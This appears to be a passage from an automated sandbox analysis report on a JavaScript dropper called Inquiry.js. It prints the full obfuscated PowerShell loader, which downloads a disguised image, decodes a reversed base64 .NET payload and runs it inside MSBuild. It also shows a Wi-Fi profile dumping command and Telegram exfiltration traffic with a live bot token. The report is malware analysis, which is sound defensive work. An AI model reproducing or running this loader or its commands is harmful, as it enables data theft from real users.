$CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.or

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.or

          Stealing of Sensitive Information

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 3412, ParentProcessName: MSBuild.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 3760, ProcessName: cmd.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-15T09:58:36.298396+010020576351A Network Trojan was detected162.241.87.113443192.168.2.449738TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-15T09:58:14.455724+010020490381A Network Trojan was detected207.241.227.155443192.168.2.449731TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-15T09:58:46.260913+010028550391A Network Trojan was detected192.168.2.449741149.154.167.220443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-15T09:58:45.764341+010018100081Potentially Bad Traffic192.168.2.449741149.154.167.220443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://melbournedistillers.com.au/file/114.txtAvira URL Cloud: Label: malware
          Source: MSBuild.exe.3412.7.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendMessage"}
          Source: Inquiry.jsVirustotal: Detection: 8%Perma Link
          Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 207.241.227.155:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.241.87.113:443 -> 192.168.2.4:49738 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49741 version: TLS 1.2

          Software Vulnerabilities

          barindex
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

          barindex
          Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49741 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2855039 - Severity 1 - ETPRO MALWARE UNK Stealer Telegram Exfil : 192.168.2.4:49741 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 207.241.227.155:443 -> 192.168.2.4:49731
          Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 162.241.87.113:443 -> 192.168.2.4:49738
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 23.186.113.60 443Jump to behavior
          Source: unknownDNS query: name: paste.ee
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /10/items/new_image_202501/new_image.jpg HTTP/1.1Host: ia600805.us.archive.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /file/114.txt HTTP/1.1Host: melbournedistillers.com.auConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638725145275971619Host: api.telegram.orgContent-Length: 5113Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 162.241.87.113 162.241.87.113
          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: icanhazip.com
          Source: unknownDNS query: name: ip-api.com
          Source: global trafficHTTP traffic detected: GET /d/rVRbIsie HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /d/rVRbIsie HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /10/items/new_image_202501/new_image.jpg HTTP/1.1Host: ia600805.us.archive.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /file/114.txt HTTP/1.1Host: melbournedistillers.com.auConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: paste.ee
          Source: global trafficDNS traffic detected: DNS query: ia600805.us.archive.org
          Source: global trafficDNS traffic detected: DNS query: melbournedistillers.com.au
          Source: global trafficDNS traffic detected: DNS query: icanhazip.com
          Source: global trafficDNS traffic detected: DNS query: 121.205.6.0.in-addr.arpa
          Source: global trafficDNS traffic detected: DNS query: ip-api.com
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: unknownHTTP traffic detected: POST /bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638725145275971619Host: api.telegram.orgContent-Length: 5113Connection: Keep-Alive
          Source: MSBuild.exe, 00000007.00000002.2118047859.00000000037FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: cert9.db.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: cert9.db.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: cert9.db.7.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: cert9.db.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: cert9.db.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: cert9.db.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: cert9.db.7.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: MSBuild.exe, 00000007.00000002.2118047859.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2118047859.000000000354D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2118047859.000000000345F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2118047859.000000000345F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
          Source: MSBuild.exe, 00000007.00000002.2118047859.000000000345F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/t
          Source: MSBuild.exe, 00000007.00000002.2118047859.00000000037C4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003764000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
          Source: cert9.db.7.drString found in binary or memory: http://ocsp.digicert.com0
          Source: cert9.db.7.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: powershell.exe, 00000001.00000002.2011416619.000001CF9F8E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000001.00000002.2011416619.000001CF9F6C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2118047859.0000000003423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000001.00000002.2011416619.000001CF9F8E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: wscript.exe, 00000000.00000003.1735248192.0000020A01AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.orl
          Source: cert9.db.7.drString found in binary or memory: http://x1.c.lencr.org/0
          Source: cert9.db.7.drString found in binary or memory: http://x1.i.lencr.org/0
          Source: MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000001.00000002.2011416619.000001CF9F6C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: wscript.exe, 00000000.00000002.1737787206.0000020A7FAB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
          Source: wscript.exe, 00000000.00000002.1736198103.0000020A01750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
          Source: MSBuild.exe, 00000007.00000002.2118047859.00000000037FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: MSBuild.exe, 00000007.00000002.2118047859.00000000037FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: MSBuild.exe, 00000007.00000002.2118047859.00000000037FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendDocument
          Source: MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: wscript.exe, 00000000.00000002.1736198103.0000020A01750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
          Source: wscript.exe, 00000000.00000002.1737787206.0000020A7FAB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
          Source: MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: MSBuild.exe, 00000007.00000002.2118047859.000000000362D000.00000004.00000800.00020000.00000000.sdmp, tmp558.tmp.dat.7.drString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: tmp558.tmp.dat.7.drString found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
          Source: MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: wscript.exe, 00000000.00000002.1737787206.0000020A7FAB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
          Source: wscript.exe, 00000000.00000002.1737787206.0000020A7FAB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
          Source: powershell.exe, 00000001.00000002.2011416619.000001CF9F8E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000002.2011416619.000001CF9F8E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600805.us.archive.org
          Source: powershell.exe, 00000001.00000002.2010907264.000001CF9D9D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg
          Source: powershell.exe, 00000001.00000002.2011416619.000001CF9F8E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpgX
          Source: wscript.exe, 00000000.00000002.1737195665.0000020A01DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735276479.0000020A01DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: wscript.exe, 00000000.00000002.1737195665.0000020A01DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735276479.0000020A01DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
          Source: wscript.exe, 00000000.00000002.1737195665.0000020A01DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735276479.0000020A01DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/U
          Source: wscript.exe, 00000000.00000003.1734007044.0000020A01C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735498400.0000020A7FB83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rVRbIsie
          Source: wscript.exe, 00000000.00000002.1737055356.0000020A01C96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1734301630.0000020A01C95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1734007044.0000020A01C8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rVRbIsiehT
          Source: wscript.exe, 00000000.00000002.1736198103.0000020A01750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
          Source: MSBuild.exe, 00000007.00000002.2118047859.000000000354D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.micro
          Source: tmp178.tmp.dat.7.drString found in binary or memory: https://support.mozilla.org
          Source: tmp178.tmp.dat.7.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: tmp178.tmp.dat.7.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
          Source: MSBuild.exe, 00000007.00000002.2118047859.000000000354D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004470000.00000004.00000800.00020000.00000000.sdmp, tmp46C.tmp.dat.7.dr, tmp42D.tmp.dat.7.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: MSBuild.exe, 00000007.00000002.2140780732.000000000444B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004424000.00000004.00000800.00020000.00000000.sdmp, tmp46C.tmp.dat.7.dr, tmp42D.tmp.dat.7.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
          Source: MSBuild.exe, 00000007.00000002.2118047859.000000000354D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004470000.00000004.00000800.00020000.00000000.sdmp, tmp46C.tmp.dat.7.dr, tmp42D.tmp.dat.7.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: MSBuild.exe, 00000007.00000002.2140780732.000000000444B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004424000.00000004.00000800.00020000.00000000.sdmp, tmp46C.tmp.dat.7.dr, tmp42D.tmp.dat.7.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
          Source: wscript.exe, 00000000.00000002.1737787206.0000020A7FAB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co/API/FETCH/getcountry.php
          Source: MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drString found in binary or memory: https://www.ecosia.org/newtab/
          Source: wscript.exe, 00000000.00000002.1736198103.0000020A01750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: MSBuild.exe, 00000007.00000002.2140780732.0000000004420000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2140780732.0000000004488000.00000004.00000800.00020000.00000000.sdmp, tmp361.tmp.dat.7.dr, tmp5B6.tmp.dat.7.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: wscript.exe, 00000000.00000002.1737787206.0000020A7FAB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
          Source: wscript.exe, 00000000.00000002.1736198103.0000020A01750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: tmp178.tmp.dat.7.drString found in binary or memory: https://www.mozilla.org
          Source: tmp178.tmp.dat.7.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: tmp178.tmp.dat.7.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.2118047859.0000000003421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
          Source: tmp178.tmp.dat.7.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: tmp178.tmp.dat.7.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: tmp178.tmp.dat.7.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: MSBuild.exe, 00000007.00000002.2118047859.000000000373B000.00000004.00000800.00020000.00000000.sdmp, tmp761.tmp.dat.7.drString found in binary or memory: https://www.office.com/
          Source: MSBuild.exe, 00000007.00000002.2118047859.000000000373B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/LR
          Source: tmp761.tmp.dat.7.drString found in binary or memory: https://www.office.com/Office
          Source: MSBuild.exe, 00000007.00000002.2154852069.0000000006625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.oracle.com/technetwork/java/javase/downloads
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 207.241.227.155:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.241.87.113:443 -> 192.168.2.4:49738 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

          System Summary

          barindex
          Source: Process Memory Space: powershell.exe PID: 2596, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
